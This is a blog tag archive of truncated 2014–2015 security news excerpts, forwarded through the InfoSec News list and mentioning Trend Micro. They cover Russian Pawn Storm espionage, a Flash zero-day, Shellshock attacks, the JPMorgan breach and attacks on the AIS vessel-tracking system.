Tag Archives: trend micro

[ISN] Russian cyberspies targeted the MH17 crash investigation

www.networkworld.com/article/2996762/russian-cyberspies-targeted-the-mh17-crash-investigation.html By Lucian Constantin IDG News Service Oct 23, 2015 A Russian cyberespionage group that frequently targets government institutions from NATO member countries tried to infiltrate the international investigation into the crash of Malaysia Airlines Flight 17 (MH17). MH17 was a passenger flight from Amsterdam to Kuala Lumpur that crashed in eastern Ukraine close to the Russian border on 17 July, 2014. All 283 passengers and 15 crew members lost their lives. The Dutch Safety Board led an international investigation into the incident and released a final report on Oct. 13, concluding that the Boeing 777-200 aircraft was shot down by a warhead launched from a Russian-built Buk missile system. Security researchers from Trend Micro have found evidence that a cyberespionage group dubbed Pawn Storm, which has long been suspected to have ties to the Russian intelligence services, has targeted the Dutch Safety Board before and after the MH17 report was finalized. […]




Facebooktwittergoogle_plusredditpinterestlinkedinmail

[ISN] Fake EFF site serving espionage malware was likely active for 3+ weeks

http://arstechnica.com/security/2015/08/fake-eff-site-serving-espionage-malware-was-likely-active-for-3-weeks/ By Dan Goodin Ars Technica Aug 28, 2015 A spear-phishing campaign some researchers say is linked to the Russian government masqueraded as the Electronic Frontier Foundation in an attempt to infect targets with malware that collects passwords and other sensitive data. The targeted e-mails, which link to the fraudulent domain electronicfrontierfoundation.org, appear to be part of a larger campaign known as Pawn Storm. Last October, researchers at security firm Trend Micro brought the campaign to light and said it was targeting US military, embassy, and defense contractor personnel, dissidents of the Russian government, and international media organizations. Last month, Trend Micro said the espionage malware campaign entered a new phase by exploiting what then was a zero-day vulnerability in Oracle’s widely used Java browser plugin. Separate security firm FireEye has said the group behind the attacks has ties to Russia’s government and has been active since at least 2007. EFF staff technologist Cooper Quintin wrote in a blog post published Thursday that the round of attacks involving the electronicfrontierfoundation.org site may have the ability to infect Mac and Linux machines, as well as the normal Windows fare. On Windows, the campaign downloads a payload known as Sednit that ultimately installs a keylogger and other malicious modules. Its use of the same path names, Java payloads, and Java exploits found in last month’s campaign mean it’s almost certainly the work of the same Pawn Storm actors that struck last month. Quintin wrote: […]


Facebooktwittergoogle_plusredditpinterestlinkedinmail

[ISN] The tooth gnashing you hear is from Flash users installing a new 0day patch

http://arstechnica.com/security/2015/01/those-teeth-gnashings-you-hear-are-flash-users-installing-a-new-0day-patch/ By Dan Goodin Ars Technica Jan 26 2015 Adobe Systems is once again rolling out an emergency Flash update that patches a critical vulnerability under active attack to compromise the computers of unsuspecting users. The latest Flash versions fix a remote code-execution bug that, as Ars reported last week, recently came under attack in the Angler exploit kit. Malware purveyors and other types of online crooks use such kits to seed compromised websites with attack code. Once people visit the sites with vulnerable computers, the booby-trapped pages surreptitiously exploit the vulnerabilities and install backdoors that can be used to log keystrokes, steal passwords, and install new pieces of malware at will. An advisory Adobe published late last week warned that the bug resides in versions running on Windows, Macs, and Linux systems. So far, reports suggest that in-the-wild exploits are limited only to Windows systems. The vulnerability stems from a so-called use-after-free bug that allows attackers to corrupt the memory of affected computers. Trend Micro has additional technical details here. “A critical vulnerability (CVE-2015-0311) exists in Adobe Flash Player 16.0.0.287 and earlier versions for Windows and Macintosh,” the Adobe advisory stated. “Successful exploitation could cause a crash and potentially allow an attacker to take control of the affected system. We are aware of reports that this vulnerability is being actively exploited in the wild via drive-by-download attacks against systems running Internet Explorer and Firefox on Windows 8.1 and below.” […]


Facebooktwittergoogle_plusredditpinterestlinkedinmail

[ISN] Shellshock DDoS Attacks Spike

http://www.bankinfosecurity.com/shellshock-ddos-attacks-spike-a-7365 By Mathew J. Schwartz Bank Info Security September 29, 2014 Distributed-denial-of-service attacks that target the Bash flaws known as Shellshock have spiked in recent days. “We’re seeing north of 1.5 million #shellshock attacks across the @CloudFlare network daily,” says Matthew Prince, CEO of the content delivery network and DDoS defense firm CloudFlare. Prince says that count is determined by the company’s Web application firewall detecting attempted attacks that use the Shellshock flaw. Shellshock-targeting DDoS attacks and IRC bots were spotted less than 24 hours after news about the Bash bug went public last week. Since then, security software vendor Trend Micro says it’s also seen Shellshock-related IP address probes directed against unnamed institutions in Brazil, as well as at least one financial services firm in China. “Attackers were trying to see if several IPs owned by the institution were vulnerable to a Shellshock vulnerability, specifically CVE-2014-6271. Further analysis revealed that three of the tested IPs were possibly vulnerable, as the attackers tried to use the command … ‘uname’ [to display] system information, including the OS platform, the machine type, and the processor information.” To date, however, the security software vendor hasn’t seen the exploit being used to deliver malware payloads. “At first glance, retrieving system information might seem harmless,” Trend Micro says. But this reconnaissance “could possibly be a sign of preparation for … more damaging attacks.” […]


Facebooktwittergoogle_plusredditpinterestlinkedinmail

[ISN] JPMorgan Had Exodus of Tech Talent Before Hacker Breach

http://www.bloomberg.com/news/2014-09-05/jpmorgan-had-exodus-of-tech-talent-before-hacker-breach.html By Hugh Son and Michael Riley Bloomberg.com Sep 5, 2014 As hackers pierced JPMorgan Chase & Co.’s (JPM) defenses in June, the bank’s cybersecurity chief was just getting acquainted with his employer and its sprawling technology infrastructure. Greg Rattray, a former U.S. Air Force commander for information warfare, became JPMorgan’s head of information security that month after upheaval at the highest levels of the bank’s tech division. His predecessor, Anthony Belfiore, had resigned early this year to join at least five JPMorgan leaders at First Data Corp. In between, Anish Bhimani was acting security officer while holding at least one other tech role. “It sucks that this happened at the beginning of Greg’s watch, but this is a legacy issue,” said Tom Kellermann, chief cybersecurity officer at anti-virus software firm Trend Micro Inc. “They had an acting person who was juggling way too much, with no one fully dedicated to the role for a bit of time.” JPMorgan, led by Chief Executive Officer Jamie Dimon, 58, has rushed to determine the scope of the assault and restore confidence in security at the biggest U.S. lender. While hackers targeted other banks’ systems, JPMorgan is the only bank said to have had gigabytes of data stolen, including information on customer accounts. […]


Facebooktwittergoogle_plusredditpinterestlinkedinmail

[ISN] Treasury’s New Focus on Cyber-Risks

http://www.bankinfosecurity.com/treasurys-new-focus-on-cyber-risks-a-7068 By Tracy Kitten Bank Info Security July 17, 2014 Treasury Secretary Jacob Lew this week took the precedent-setting step of publicly addressing what he referred to as the financial system’s cybersecurity shortcomings. Lew’s comments were noteworthy because they apparently mark the first time a member of the Treasury Department has directly addressed cyber-risks. Lew’s remarks about the need for banking institutions, retailers and all other parties involved in financial services to make cybersecurity, and cyberthreat information sharing, a top priority could signal a policy shift for the Treasury, says Tom Kellerman, chief cybersecurity officer at Trend Micro. “This is the first time a Secretary of Treasury has made such a declaration,” Kellermann says. “The regulators and bank examiners will now become much more proactive in their roles.” Point-of-sale attacks against major retailers, including Target Corp., Neiman Marcus and retail crafts store chain Michaels, illustrate why cyberthreat information sharing is needed to adequately protect the country’s critical infrastructure, Lew noted during the Delivering Alpha conference hosted July 17 by cable news station CNBC and global financial magazine Institutional Investor. […]


Facebooktwittergoogle_plusredditpinterestlinkedinmail

[ISN] Vessel-tracking system vulnerable to denial-of-service, other attacks, researchers say

Forwarded from: security curmudgeon On Fri, 30 May 2014, InfoSec News wrote: : http://news.techworld.com/security/3522313/vessel-tracking-system-vulnerable-to-denial-of-service-other-attacks-researchers-say/ : : By Lucian Constantin : Techworld.com : 29 May 2014 : : Inexpensive equipment can be used to disrupt vessel-tracking systems and : important communications between ships and port authorities, according : to two security researchers. : : During the Hack in the Box conference in Amsterdam Thursday, Marco : Balduzzi, a senior research scientist at Trend Micro, and independent : security researcher Alessandro Pasta described three new attacks against : the Automatic Identification System (AIS), which is used by over 400,000 : ships worldwide. Talk about milking a vulnerability… These two disclosed the AIS vulnerabilities October 10, 2013. They are still getting mileage out of it… […]


Facebooktwittergoogle_plusredditpinterestlinkedinmail

[ISN] Microsoft Word Vulnerability Used Against Taiwanese Government

http://www.techweekeurope.co.uk/news/microsoft-word-vulnerability-used-target-taiwanese-government-145370 By Thomas Brewster Tech Week Europe May 13, 2014 A vulnerability in Microsoft Word has been used to target a range of Taiwanese government bodies and an educational institute, a security company has warned. Whilst a patch was released by Microsoft in its April Patch Tuesday release, attackers continue to use the flaw in the knowledge that organisations would have failed to update their systems. The first attack spotted by researchers at Trend Micro used an email with a malicious attachment, claiming to have been sent by a government employee offering information on a national poll. The second used similar tactics, but focused on free trade issues, with an attachment containing a title about a work project. Both dropped malware onto the targets’ systems, which was capable of stealing files and persistent surveillance. The attacks have been tied to a campaign known as Taidoor, which has used zero-day flaws in Internet Explorer to hit high-profile targets in the past. […]


Facebooktwittergoogle_plusredditpinterestlinkedinmail